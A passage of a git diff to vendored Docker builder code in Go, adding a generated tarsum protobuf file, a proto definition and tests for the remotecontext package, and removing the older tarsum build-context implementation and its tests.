+		return errors.Errorf("invalid fileinfo: %s", p)
+	}
+
+	hfi := &fileInfo{
+		sum: h.Digest().Hex(),
+	}
+	cs.txn.Insert([]byte(p), hfi)
+	cs.mu.Unlock()
+	return nil
+}
+
+func (cs *CachableSource) getRoot() *iradix.Node {
+	cs.mu.Lock()
+	if cs.txn != nil {
+		cs.tree = cs.txn.Commit()
+		cs.txn = nil
+	}
+	t := cs.tree
+	cs.mu.Unlock()
+	return t.Root()
+}
+
+// Close closes the source
+func (cs *CachableSource) Close() error {
+	return nil
+}
+
+// Hash returns a hash for a single file in the source
+func (cs *CachableSource) Hash(path string) (string, error) {
+	n := cs.getRoot()
+	// TODO: check this for symlinks
+	v, ok := n.Get([]byte(path))
+	if !ok {
+		return path, nil
+	}
+	return v.(*fileInfo).sum, nil
+}
+
+// Root returns a root directory for the source
+func (cs *CachableSource) Root() containerfs.ContainerFS {
+	return cs.root
+}
+
+type fileInfo struct {
+	sum string
+}
+
+func (fi *fileInfo) Hash() string {
+	return fi.sum
+}
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go
new file mode 100644
index 0000000000..1d23bbe65b
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.pb.go
@@ -0,0 +1,525 @@
+// Code generated by protoc-gen-gogo.
+// source: tarsum.proto
+// DO NOT EDIT!
+
+/*
+Package remotecontext is a generated protocol buffer package.
+
+It is generated from these files:
+	tarsum.proto
+
+It has these top-level messages:
+	TarsumBackup
+*/
+package remotecontext
+
+import proto "github.com/gogo/protobuf/proto"
+import fmt "fmt"
+import math "math"
+
+import strings "strings"
+import reflect "reflect"
+import github_com_gogo_protobuf_sortkeys "github.com/gogo/protobuf/sortkeys"
+
+import io "io"
+
+// Reference imports to suppress errors if they are not otherwise used.
+var _ = proto.Marshal
+var _ = fmt.Errorf
+var _ = math.Inf
+
+// This is a compile-time assertion to ensure that this generated file
+// is compatible with the proto package it is being compiled against.
+// A compilation error at this line likely means your copy of the
+// proto package needs to be updated.
+const _ = proto.GoGoProtoPackageIsVersion2 // please upgrade the proto package
+
+type TarsumBackup struct {
+	Hashes map[string]string `protobuf:"bytes,1,rep,name=Hashes" json:"Hashes,omitempty" protobuf_key:"bytes,1,opt,name=key,proto3" protobuf_val:"bytes,2,opt,name=value,proto3"`
+}
+
+func (m *TarsumBackup) Reset()                    { *m = TarsumBackup{} }
+func (*TarsumBackup) ProtoMessage()               {}
+func (*TarsumBackup) Descriptor() ([]byte, []int) { return fileDescriptorTarsum, []int{0} }
+
+func (m *TarsumBackup) GetHashes() map[string]string {
+	if m != nil {
+		return m.Hashes
+	}
+	return nil
+}
+
+func init() {
+	proto.RegisterType((*TarsumBackup)(nil), "remotecontext.TarsumBackup")
+}
+func (this *TarsumBackup) Equal(that interface{}) bool {
+	if that == nil {
+		if this == nil {
+			return true
+		}
+		return false
+	}
+
+	that1, ok := that.(*TarsumBackup)
+	if !ok {
+		that2, ok := that.(TarsumBackup)
+		if ok {
+			that1 = &that2
+		} else {
+			return false
+		}
+	}
+	if that1 == nil {
+		if this == nil {
+			return true
+		}
+		return false
+	} else if this == nil {
+		return false
+	}
+	if len(this.Hashes) != len(that1.Hashes) {
+		return false
+	}
+	for i := range this.Hashes {
+		if this.Hashes[i] != that1.Hashes[i] {
+			return false
+		}
+	}
+	return true
+}
+func (this *TarsumBackup) GoString() string {
+	if this == nil {
+		return "nil"
+	}
+	s := make([]string, 0, 5)
+	s = append(s, "&remotecontext.TarsumBackup{")
+	keysForHashes := make([]string, 0, len(this.Hashes))
+	for k := range this.Hashes {
+		keysForHashes = append(keysForHashes, k)
+	}
+	github_com_gogo_protobuf_sortkeys.Strings(keysForHashes)
+	mapStringForHashes := "map[string]string{"
+	for _, k := range keysForHashes {
+		mapStringForHashes += fmt.Sprintf("%#v: %#v,", k, this.Hashes[k])
+	}
+	mapStringForHashes += "}"
+	if this.Hashes != nil {
+		s = append(s, "Hashes: "+mapStringForHashes+",\n")
+	}
+	s = append(s, "}")
+	return strings.Join(s, "")
+}
+func valueToGoStringTarsum(v interface{}, typ string) string {
+	rv := reflect.ValueOf(v)
+	if rv.IsNil() {
+		return "nil"
+	}
+	pv := reflect.Indirect(rv).Interface()
+	return fmt.Sprintf("func(v %v) *%v { return &v } ( %#v )", typ, typ, pv)
+}
+func (m *TarsumBackup) Marshal() (dAtA []byte, err error) {
+	size := m.Size()
+	dAtA = make([]byte, size)
+	n, err := m.MarshalTo(dAtA)
+	if err != nil {
+		return nil, err
+	}
+	return dAtA[:n], nil
+}
+
+func (m *TarsumBackup) MarshalTo(dAtA []byte) (int, error) {
+	var i int
+	_ = i
+	var l int
+	_ = l
+	if len(m.Hashes) > 0 {
+		for k := range m.Hashes {
+			dAtA[i] = 0xa
+			i++
+			v := m.Hashes[k]
+			mapSize := 1 + len(k) + sovTarsum(uint64(len(k))) + 1 + len(v) + sovTarsum(uint64(len(v)))
+			i = encodeVarintTarsum(dAtA, i, uint64(mapSize))
+			dAtA[i] = 0xa
+			i++
+			i = encodeVarintTarsum(dAtA, i, uint64(len(k)))
+			i += copy(dAtA[i:], k)
+			dAtA[i] = 0x12
+			i++
+			i = encodeVarintTarsum(dAtA, i, uint64(len(v)))
+			i += copy(dAtA[i:], v)
+		}
+	}
+	return i, nil
+}
+
+func encodeFixed64Tarsum(dAtA []byte, offset int, v uint64) int {
+	dAtA[offset] = uint8(v)
+	dAtA[offset+1] = uint8(v >> 8)
+	dAtA[offset+2] = uint8(v >> 16)
+	dAtA[offset+3] = uint8(v >> 24)
+	dAtA[offset+4] = uint8(v >> 32)
+	dAtA[offset+5] = uint8(v >> 40)
+	dAtA[offset+6] = uint8(v >> 48)
+	dAtA[offset+7] = uint8(v >> 56)
+	return offset + 8
+}
+func encodeFixed32Tarsum(dAtA []byte, offset int, v uint32) int {
+	dAtA[offset] = uint8(v)
+	dAtA[offset+1] = uint8(v >> 8)
+	dAtA[offset+2] = uint8(v >> 16)
+	dAtA[offset+3] = uint8(v >> 24)
+	return offset + 4
+}
+func encodeVarintTarsum(dAtA []byte, offset int, v uint64) int {
+	for v >= 1<<7 {
+		dAtA[offset] = uint8(v&0x7f | 0x80)
+		v >>= 7
+		offset++
+	}
+	dAtA[offset] = uint8(v)
+	return offset + 1
+}
+func (m *TarsumBackup) Size() (n int) {
+	var l int
+	_ = l
+	if len(m.Hashes) > 0 {
+		for k, v := range m.Hashes {
+			_ = k
+			_ = v
+			mapEntrySize := 1 + len(k) + sovTarsum(uint64(len(k))) + 1 + len(v) + sovTarsum(uint64(len(v)))
+			n += mapEntrySize + 1 + sovTarsum(uint64(mapEntrySize))
+		}
+	}
+	return n
+}
+
+func sovTarsum(x uint64) (n int) {
+	for {
+		n++
+		x >>= 7
+		if x == 0 {
+			break
+		}
+	}
+	return n
+}
+func sozTarsum(x uint64) (n int) {
+	return sovTarsum(uint64((x << 1) ^ uint64((int64(x) >> 63))))
+}
+func (this *TarsumBackup) String() string {
+	if this == nil {
+		return "nil"
+	}
+	keysForHashes := make([]string, 0, len(this.Hashes))
+	for k := range this.Hashes {
+		keysForHashes = append(keysForHashes, k)
+	}
+	github_com_gogo_protobuf_sortkeys.Strings(keysForHashes)
+	mapStringForHashes := "map[string]string{"
+	for _, k := range keysForHashes {
+		mapStringForHashes += fmt.Sprintf("%v: %v,", k, this.Hashes[k])
+	}
+	mapStringForHashes += "}"
+	s := strings.Join([]string{`&TarsumBackup{`,
+		`Hashes:` + mapStringForHashes + `,`,
+		`}`,
+	}, "")
+	return s
+}
+func valueToStringTarsum(v interface{}) string {
+	rv := reflect.ValueOf(v)
+	if rv.IsNil() {
+		return "nil"
+	}
+	pv := reflect.Indirect(rv).Interface()
+	return fmt.Sprintf("*%v", pv)
+}
+func (m *TarsumBackup) Unmarshal(dAtA []byte) error {
+	l := len(dAtA)
+	iNdEx := 0
+	for iNdEx < l {
+		preIndex := iNdEx
+		var wire uint64
+		for shift := uint(0); ; shift += 7 {
+			if shift >= 64 {
+				return ErrIntOverflowTarsum
+			}
+			if iNdEx >= l {
+				return io.ErrUnexpectedEOF
+			}
+			b := dAtA[iNdEx]
+			iNdEx++
+			wire |= (uint64(b) & 0x7F) << shift
+			if b < 0x80 {
+				break
+			}
+		}
+		fieldNum := int32(wire >> 3)
+		wireType := int(wire & 0x7)
+		if wireType == 4 {
+			return fmt.Errorf("proto: TarsumBackup: wiretype end group for non-group")
+		}
+		if fieldNum <= 0 {
+			return fmt.Errorf("proto: TarsumBackup: illegal tag %d (wire type %d)", fieldNum, wire)
+		}
+		switch fieldNum {
+		case 1:
+			if wireType != 2 {
+				return fmt.Errorf("proto: wrong wireType = %d for field Hashes", wireType)
+			}
+			var msglen int
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowTarsum
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				msglen |= (int(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			if msglen < 0 {
+				return ErrInvalidLengthTarsum
+			}
+			postIndex := iNdEx + msglen
+			if postIndex > l {
+				return io.ErrUnexpectedEOF
+			}
+			var keykey uint64
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowTarsum
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				keykey |= (uint64(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			var stringLenmapkey uint64
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return ErrIntOverflowTarsum
+				}
+				if iNdEx >= l {
+					return io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				stringLenmapkey |= (uint64(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			intStringLenmapkey := int(stringLenmapkey)
+			if intStringLenmapkey < 0 {
+				return ErrInvalidLengthTarsum
+			}
+			postStringIndexmapkey := iNdEx + intStringLenmapkey
+			if postStringIndexmapkey > l {
+				return io.ErrUnexpectedEOF
+			}
+			mapkey := string(dAtA[iNdEx:postStringIndexmapkey])
+			iNdEx = postStringIndexmapkey
+			if m.Hashes == nil {
+				m.Hashes = make(map[string]string)
+			}
+			if iNdEx < postIndex {
+				var valuekey uint64
+				for shift := uint(0); ; shift += 7 {
+					if shift >= 64 {
+						return ErrIntOverflowTarsum
+					}
+					if iNdEx >= l {
+						return io.ErrUnexpectedEOF
+					}
+					b := dAtA[iNdEx]
+					iNdEx++
+					valuekey |= (uint64(b) & 0x7F) << shift
+					if b < 0x80 {
+						break
+					}
+				}
+				var stringLenmapvalue uint64
+				for shift := uint(0); ; shift += 7 {
+					if shift >= 64 {
+						return ErrIntOverflowTarsum
+					}
+					if iNdEx >= l {
+						return io.ErrUnexpectedEOF
+					}
+					b := dAtA[iNdEx]
+					iNdEx++
+					stringLenmapvalue |= (uint64(b) & 0x7F) << shift
+					if b < 0x80 {
+						break
+					}
+				}
+				intStringLenmapvalue := int(stringLenmapvalue)
+				if intStringLenmapvalue < 0 {
+					return ErrInvalidLengthTarsum
+				}
+				postStringIndexmapvalue := iNdEx + intStringLenmapvalue
+				if postStringIndexmapvalue > l {
+					return io.ErrUnexpectedEOF
+				}
+				mapvalue := string(dAtA[iNdEx:postStringIndexmapvalue])
+				iNdEx = postStringIndexmapvalue
+				m.Hashes[mapkey] = mapvalue
+			} else {
+				var mapvalue string
+				m.Hashes[mapkey] = mapvalue
+			}
+			iNdEx = postIndex
+		default:
+			iNdEx = preIndex
+			skippy, err := skipTarsum(dAtA[iNdEx:])
+			if err != nil {
+				return err
+			}
+			if skippy < 0 {
+				return ErrInvalidLengthTarsum
+			}
+			if (iNdEx + skippy) > l {
+				return io.ErrUnexpectedEOF
+			}
+			iNdEx += skippy
+		}
+	}
+
+	if iNdEx > l {
+		return io.ErrUnexpectedEOF
+	}
+	return nil
+}
+func skipTarsum(dAtA []byte) (n int, err error) {
+	l := len(dAtA)
+	iNdEx := 0
+	for iNdEx < l {
+		var wire uint64
+		for shift := uint(0); ; shift += 7 {
+			if shift >= 64 {
+				return 0, ErrIntOverflowTarsum
+			}
+			if iNdEx >= l {
+				return 0, io.ErrUnexpectedEOF
+			}
+			b := dAtA[iNdEx]
+			iNdEx++
+			wire |= (uint64(b) & 0x7F) << shift
+			if b < 0x80 {
+				break
+			}
+		}
+		wireType := int(wire & 0x7)
+		switch wireType {
+		case 0:
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return 0, ErrIntOverflowTarsum
+				}
+				if iNdEx >= l {
+					return 0, io.ErrUnexpectedEOF
+				}
+				iNdEx++
+				if dAtA[iNdEx-1] < 0x80 {
+					break
+				}
+			}
+			return iNdEx, nil
+		case 1:
+			iNdEx += 8
+			return iNdEx, nil
+		case 2:
+			var length int
+			for shift := uint(0); ; shift += 7 {
+				if shift >= 64 {
+					return 0, ErrIntOverflowTarsum
+				}
+				if iNdEx >= l {
+					return 0, io.ErrUnexpectedEOF
+				}
+				b := dAtA[iNdEx]
+				iNdEx++
+				length |= (int(b) & 0x7F) << shift
+				if b < 0x80 {
+					break
+				}
+			}
+			iNdEx += length
+			if length < 0 {
+				return 0, ErrInvalidLengthTarsum
+			}
+			return iNdEx, nil
+		case 3:
+			for {
+				var innerWire uint64
+				var start int = iNdEx
+				for shift := uint(0); ; shift += 7 {
+					if shift >= 64 {
+						return 0, ErrIntOverflowTarsum
+					}
+					if iNdEx >= l {
+						return 0, io.ErrUnexpectedEOF
+					}
+					b := dAtA[iNdEx]
+					iNdEx++
+					innerWire |= (uint64(b) & 0x7F) << shift
+					if b < 0x80 {
+						break
+					}
+				}
+				innerWireType := int(innerWire & 0x7)
+				if innerWireType == 4 {
+					break
+				}
+				next, err := skipTarsum(dAtA[start:])
+				if err != nil {
+					return 0, err
+				}
+				iNdEx = start + next
+			}
+			return iNdEx, nil
+		case 4:
+			return iNdEx, nil
+		case 5:
+			iNdEx += 4
+			return iNdEx, nil
+		default:
+			return 0, fmt.Errorf("proto: illegal wireType %d", wireType)
+		}
+	}
+	panic("unreachable")
+}
+
+var (
+	ErrInvalidLengthTarsum = fmt.Errorf("proto: negative length found during unmarshaling")
+	ErrIntOverflowTarsum   = fmt.Errorf("proto: integer overflow")
+)
+
+func init() { proto.RegisterFile("tarsum.proto", fileDescriptorTarsum) }
+
+var fileDescriptorTarsum = []byte{
+	// 196 bytes of a gzipped FileDescriptorProto
+	0x1f, 0x8b, 0x08, 0x00, 0x00, 0x09, 0x6e, 0x88, 0x02, 0xff, 0xe2, 0xe2, 0x29, 0x49, 0x2c, 0x2a,
+	0x2e, 0xcd, 0xd5, 0x2b, 0x28, 0xca, 0x2f, 0xc9, 0x17, 0xe2, 0x2d, 0x4a, 0xcd, 0xcd, 0x2f, 0x49,
+	0x4d, 0xce, 0xcf, 0x2b, 0x49, 0xad, 0x28, 0x51, 0xea, 0x62, 0xe4, 0xe2, 0x09, 0x01, 0xcb, 0x3b,
+	0x25, 0x26, 0x67, 0x97, 0x16, 0x08, 0xd9, 0x73, 0xb1, 0x79, 0x24, 0x16, 0x67, 0xa4, 0x16, 0x4b,
+	0x30, 0x2a, 0x30, 0x6b, 0x70, 0x1b, 0xa9, 0xeb, 0xa1, 0x68, 0xd0, 0x43, 0x56, 0xac, 0x07, 0x51,
+	0xe9, 0x9a, 0x57, 0x52, 0x54, 0x19, 0x04, 0xd5, 0x26, 0x65, 0xc9, 0xc5, 0x8d, 0x24, 0x2c, 0x24,
+	0xc0, 0xc5, 0x9c, 0x9d, 0x5a, 0x29, 0xc1, 0xa8, 0xc0, 0xa8, 0xc1, 0x19, 0x04, 0x62, 0x0a, 0x89,
+	0x70, 0xb1, 0x96, 0x25, 0xe6, 0x94, 0xa6, 0x4a, 0x30, 0x81, 0xc5, 0x20, 0x1c, 0x2b, 0x26, 0x0b,
+	0x46, 0x27, 0x9d, 0x0b, 0x0f, 0xe5, 0x18, 0x6e, 0x3c, 0x94, 0x63, 0xf8, 0xf0, 0x50, 0x8e, 0xb1,
+	0xe1, 0x91, 0x1c, 0xe3, 0x8a, 0x47, 0x72, 0x8c, 0x27, 0x1e, 0xc9, 0x31, 0x5e, 0x78, 0x24, 0xc7,
+	0xf8, 0xe0, 0x91, 0x1c, 0xe3, 0x8b, 0x47, 0x72, 0x0c, 0x1f, 0x1e, 0xc9, 0x31, 0x4e, 0x78, 0x2c,
+	0xc7, 0x90, 0xc4, 0x06, 0xf6, 0x90, 0x31, 0x20, 0x00, 0x00, 0xff, 0xff, 0x89, 0x57, 0x7d, 0x3f,
+	0xe0, 0x00, 0x00, 0x00,
+}
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto
new file mode 100644
index 0000000000..cb94240ba8
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/tarsum.proto
@@ -0,0 +1,7 @@
+syntax = "proto3";
+
+package remotecontext; // no namespace because only used internally
+
+message TarsumBackup {
+  map<string, string> Hashes = 1;
+}
\ No newline at end of file
diff --git a/vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go b/vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go
new file mode 100644
index 0000000000..46f128d9f0
--- /dev/null
+++ b/vendor/github.com/docker/docker/builder/remotecontext/tarsum_test.go
@@ -0,0 +1,151 @@
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
+
+import (
+	"io/ioutil"
+	"os"
+	"path/filepath"
+	"testing"
+
+	"github.com/docker/docker/builder"
+	"github.com/docker/docker/pkg/archive"
+	"github.com/docker/docker/pkg/reexec"
+	"github.com/pkg/errors"
+	"gotest.tools/skip"
+)
+
+const (
+	filename = "test"
+	contents = "contents test"
+)
+
+func init() {
+	reexec.Init()
+}
+
+func TestCloseRootDirectory(t *testing.T) {
+	contextDir, err := ioutil.TempDir("", "builder-tarsum-test")
+	defer os.RemoveAll(contextDir)
+	if err != nil {
+		t.Fatalf("Error with creating temporary directory: %s", err)
+	}
+
+	src := makeTestArchiveContext(t, contextDir)
+	err = src.Close()
+
+	if err != nil {
+		t.Fatalf("Error while executing Close: %s", err)
+	}
+
+	_, err = os.Stat(src.Root().Path())
+
+	if !os.IsNotExist(err) {
+		t.Fatal("Directory should not exist at this point")
+	}
+}
+
+func TestHashFile(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	createTestTempFile(t, contextDir, filename, contents, 0755)
+
+	tarSum := makeTestArchiveContext(t, contextDir)
+
+	sum, err := tarSum.Hash(filename)
+
+	if err != nil {
+		t.Fatalf("Error when executing Stat: %s", err)
+	}
+
+	if len(sum) == 0 {
+		t.Fatalf("Hash returned empty sum")
+	}
+
+	expected := "1149ab94af7be6cc1da1335e398f24ee1cf4926b720044d229969dfc248ae7ec"
+
+	if actual := sum; expected != actual {
+		t.Fatalf("invalid checksum. expected %s, got %s", expected, actual)
+	}
+}
+
+func TestHashSubdir(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	contextSubdir := filepath.Join(contextDir, "builder-tarsum-test-subdir")
+	err := os.Mkdir(contextSubdir, 0755)
+	if err != nil {
+		t.Fatalf("Failed to make directory: %s", contextSubdir)
+	}
+
+	testFilename := createTestTempFile(t, contextSubdir, filename, contents, 0755)
+
+	tarSum := makeTestArchiveContext(t, contextDir)
+
+	relativePath, err := filepath.Rel(contextDir, testFilename)
+
+	if err != nil {
+		t.Fatalf("Error when getting relative path: %s", err)
+	}
+
+	sum, err := tarSum.Hash(relativePath)
+
+	if err != nil {
+		t.Fatalf("Error when executing Stat: %s", err)
+	}
+
+	if len(sum) == 0 {
+		t.Fatalf("Hash returned empty sum")
+	}
+
+	expected := "d7f8d6353dee4816f9134f4156bf6a9d470fdadfb5d89213721f7e86744a4e69"
+
+	if actual := sum; expected != actual {
+		t.Fatalf("invalid checksum. expected %s, got %s", expected, actual)
+	}
+}
+
+func TestRemoveDirectory(t *testing.T) {
+	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
+	defer cleanup()
+
+	contextSubdir := createTestTempSubdir(t, contextDir, "builder-tarsum-test-subdir")
+
+	relativePath, err := filepath.Rel(contextDir, contextSubdir)
+
+	if err != nil {
+		t.Fatalf("Error when getting relative path: %s", err)
+	}
+
+	src := makeTestArchiveContext(t, contextDir)
+
+	_, err = src.Root().Stat(src.Root().Join(src.Root().Path(), relativePath))
+	if err != nil {
+		t.Fatalf("Statting %s shouldn't fail: %+v", relativePath, err)
+	}
+
+	tarSum := src.(modifiableContext)
+	err = tarSum.Remove(relativePath)
+	if err != nil {
+		t.Fatalf("Error when executing Remove: %s", err)
+	}
+
+	_, err = src.Root().Stat(src.Root().Join(src.Root().Path(), relativePath))
+	if !os.IsNotExist(errors.Cause(err)) {
+		t.Fatalf("Directory should not exist at this point: %+v ", err)
+	}
+}
+
+func makeTestArchiveContext(t *testing.T, dir string) builder.Source {
+	skip.If(t, os.Getuid() != 0, "skipping test that requires root")
+	tarStream, err := archive.Tar(dir, archive.Uncompressed)
+	if err != nil {
+		t.Fatalf("error: %s", err)
+	}
+	defer tarStream.Close()
+	tarSum, err := FromArchive(tarStream)
+	if err != nil {
+		t.Fatalf("Error when executing FromArchive: %s", err)
+	}
+	return tarSum
+}
diff --git a/vendor/github.com/docker/docker/builder/utils_test.go b/vendor/github.com/docker/docker/builder/remotecontext/utils_test.go
similarity index 66%
rename from vendor/github.com/docker/docker/builder/utils_test.go
rename to vendor/github.com/docker/docker/builder/remotecontext/utils_test.go
index 1101ff1d1d..6a4c707a6e 100644
--- a/vendor/github.com/docker/docker/builder/utils_test.go
+++ b/vendor/github.com/docker/docker/builder/remotecontext/utils_test.go
@@ -1,4 +1,4 @@
-package builder
+package remotecontext // import "github.com/docker/docker/builder/remotecontext"
 
 import (
 	"io/ioutil"
@@ -7,12 +7,6 @@ import (
 	"testing"
 )
 
-const (
-	dockerfileContents   = "FROM busybox"
-	dockerignoreFilename = ".dockerignore"
-	testfileContents     = "test"
-)
-
 // createTestTempDir creates a temporary directory for testing.
 // It returns the created path and a cleanup function which is meant to be used as deferred call.
 // When an error occurs, it terminates the test.
@@ -59,29 +53,3 @@ func createTestTempFile(t *testing.T, dir, filename, contents string, perm os.Fi
 
 	return filePath
 }
-
-// chdir changes current working directory to dir.
-// It returns a function which changes working directory back to the previous one.
-// This function is meant to be executed as a deferred call.
-// When an error occurs, it terminates the test.
-func chdir(t *testing.T, dir string) func() {
-	workingDirectory, err := os.Getwd()
-
-	if err != nil {
-		t.Fatalf("Error when retrieving working directory: %s", err)
-	}
-
-	err = os.Chdir(dir)
-
-	if err != nil {
-		t.Fatalf("Error when changing directory to %s: %s", dir, err)
-	}
-
-	return func() {
-		err = os.Chdir(workingDirectory)
-
-		if err != nil {
-			t.Fatalf("Error when changing back to working directory (%s): %s", workingDirectory, err)
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/builder/tarsum.go b/vendor/github.com/docker/docker/builder/tarsum.go
deleted file mode 100644
index 35054dcba1..0000000000
--- a/vendor/github.com/docker/docker/builder/tarsum.go
+++ /dev/null
@@ -1,158 +0,0 @@
-package builder
-
-import (
-	"fmt"
-	"io"
-	"os"
-	"path/filepath"
-
-	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/chrootarchive"
-	"github.com/docker/docker/pkg/ioutils"
-	"github.com/docker/docker/pkg/symlink"
-	"github.com/docker/docker/pkg/tarsum"
-)
-
-type tarSumContext struct {
-	root string
-	sums tarsum.FileInfoSums
-}
-
-func (c *tarSumContext) Close() error {
-	return os.RemoveAll(c.root)
-}
-
-func convertPathError(err error, cleanpath string) error {
-	if err, ok := err.(*os.PathError); ok {
-		err.Path = cleanpath
-		return err
-	}
-	return err
-}
-
-func (c *tarSumContext) Open(path string) (io.ReadCloser, error) {
-	cleanpath, fullpath, err := c.normalize(path)
-	if err != nil {
-		return nil, err
-	}
-	r, err := os.Open(fullpath)
-	if err != nil {
-		return nil, convertPathError(err, cleanpath)
-	}
-	return r, nil
-}
-
-func (c *tarSumContext) Stat(path string) (string, FileInfo, error) {
-	cleanpath, fullpath, err := c.normalize(path)
-	if err != nil {
-		return "", nil, err
-	}
-
-	st, err := os.Lstat(fullpath)
-	if err != nil {
-		return "", nil, convertPathError(err, cleanpath)
-	}
-
-	rel, err := filepath.Rel(c.root, fullpath)
-	if err != nil {
-		return "", nil, convertPathError(err, cleanpath)
-	}
-
-	// We set sum to path by default for the case where GetFile returns nil.
-	// The usual case is if relative path is empty.
-	sum := path
-	// Use the checksum of the followed path(not the possible symlink) because
-	// this is the file that is actually copied.
-	if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil {
-		sum = tsInfo.Sum()
-	}
-	fi := &HashedFileInfo{PathFileInfo{st, fullpath, filepath.Base(cleanpath)}, sum}
-	return rel, fi, nil
-}
-
-// MakeTarSumContext returns a build Context from a tar stream.
-//
-// It extracts the tar stream to a temporary folder that is deleted as soon as
-// the Context is closed.
-// As the extraction happens, a tarsum is calculated for every file, and the set of
-// all those sums then becomes the source of truth for all operations on this Context.
-//
-// Closing tarStream has to be done by the caller.
-func MakeTarSumContext(tarStream io.Reader) (ModifiableContext, error) {
-	root, err := ioutils.TempDir("", "docker-builder")
-	if err != nil {
-		return nil, err
-	}
-
-	tsc := &tarSumContext{root: root}
-
-	// Make sure we clean-up upon error.  In the happy case the caller
-	// is expected to manage the clean-up
-	defer func() {
-		if err != nil {
-			tsc.Close()
-		}
-	}()
-
-	decompressedStream, err := archive.DecompressStream(tarStream)
-	if err != nil {
-		return nil, err
-	}
-
-	sum, err := tarsum.NewTarSum(decompressedStream, true, tarsum.Version1)
-	if err != nil {
-		return nil, err
-	}
-
-	if err := chrootarchive.Untar(sum, root, nil); err != nil {
-		return nil, err
-	}
-
-	tsc.sums = sum.GetSums()
-
-	return tsc, nil
-}
-
-func (c *tarSumContext) normalize(path string) (cleanpath, fullpath string, err error) {
-	cleanpath = filepath.Clean(string(os.PathSeparator) + path)[1:]
-	fullpath, err = symlink.FollowSymlinkInScope(filepath.Join(c.root, path), c.root)
-	if err != nil {
-		return "", "", fmt.Errorf("Forbidden path outside the build context: %s (%s)", path, fullpath)
-	}
-	_, err = os.Lstat(fullpath)
-	if err != nil {
-		return "", "", convertPathError(err, path)
-	}
-	return
-}
-
-func (c *tarSumContext) Walk(root string, walkFn WalkFunc) error {
-	root = filepath.Join(c.root, filepath.Join(string(filepath.Separator), root))
-	return filepath.Walk(root, func(fullpath string, info os.FileInfo, err error) error {
-		rel, err := filepath.Rel(c.root, fullpath)
-		if err != nil {
-			return err
-		}
-		if rel == "." {
-			return nil
-		}
-
-		sum := rel
-		if tsInfo := c.sums.GetFile(filepath.ToSlash(rel)); tsInfo != nil {
-			sum = tsInfo.Sum()
-		}
-		fi := &HashedFileInfo{PathFileInfo{FileInfo: info, FilePath: fullpath}, sum}
-		if err := walkFn(rel, fi, nil); err != nil {
-			return err
-		}
-		return nil
-	})
-}
-
-func (c *tarSumContext) Remove(path string) error {
-	_, fullpath, err := c.normalize(path)
-	if err != nil {
-		return err
-	}
-	return os.RemoveAll(fullpath)
-}
diff --git a/vendor/github.com/docker/docker/builder/tarsum_test.go b/vendor/github.com/docker/docker/builder/tarsum_test.go
deleted file mode 100644
index 278e5830de..0000000000
--- a/vendor/github.com/docker/docker/builder/tarsum_test.go
+++ /dev/null
@@ -1,265 +0,0 @@
-package builder
-
-import (
-	"bufio"
-	"bytes"
-	"io/ioutil"
-	"os"
-	"path/filepath"
-	"testing"
-
-	"github.com/docker/docker/pkg/archive"
-	"github.com/docker/docker/pkg/reexec"
-)
-
-const (
-	filename = "test"
-	contents = "contents test"
-)
-
-func init() {
-	reexec.Init()
-}
-
-func TestCloseRootDirectory(t *testing.T) {
-	contextDir, err := ioutil.TempDir("", "builder-tarsum-test")
-
-	if err != nil {
-		t.Fatalf("Error with creating temporary directory: %s", err)
-	}
-
-	tarsum := &tarSumContext{root: contextDir}
-
-	err = tarsum.Close()
-
-	if err != nil {
-		t.Fatalf("Error while executing Close: %s", err)
-	}
-
-	_, err = os.Stat(contextDir)
-
-	if !os.IsNotExist(err) {
-		t.Fatalf("Directory should not exist at this point")
-		defer os.RemoveAll(contextDir)
-	}
-}
-
-func TestOpenFile(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
-	defer cleanup()
-
-	createTestTempFile(t, contextDir, filename, contents, 0777)
-
-	tarSum := &tarSumContext{root: contextDir}
-
-	file, err := tarSum.Open(filename)
-
-	if err != nil {
-		t.Fatalf("Error when executing Open: %s", err)
-	}
-
-	defer file.Close()
-
-	scanner := bufio.NewScanner(file)
-	buff := bytes.NewBufferString("")
-
-	for scanner.Scan() {
-		buff.WriteString(scanner.Text())
-	}
-
-	if contents != buff.String() {
-		t.Fatalf("Contents are not equal. Expected: %s, got: %s", contents, buff.String())
-	}
-
-}
-
-func TestOpenNotExisting(t *testing.T) {
-	contextDir, cleanup := createTestTempDir(t, "", "builder-tarsum-test")
-	defer cleanup()
-
-	tarSum := &tarSumContext{root: contextDir}
-
-	file, err := tarSum.Open("not-existing")
-
-	if file != nil {
-		t.Fatal("Opened file should be nil")
-	}
-
-	if !os.IsNotExist(err) {
-		t.Fatalf("Error when executing Open: %s", err)
-	}
-}
-
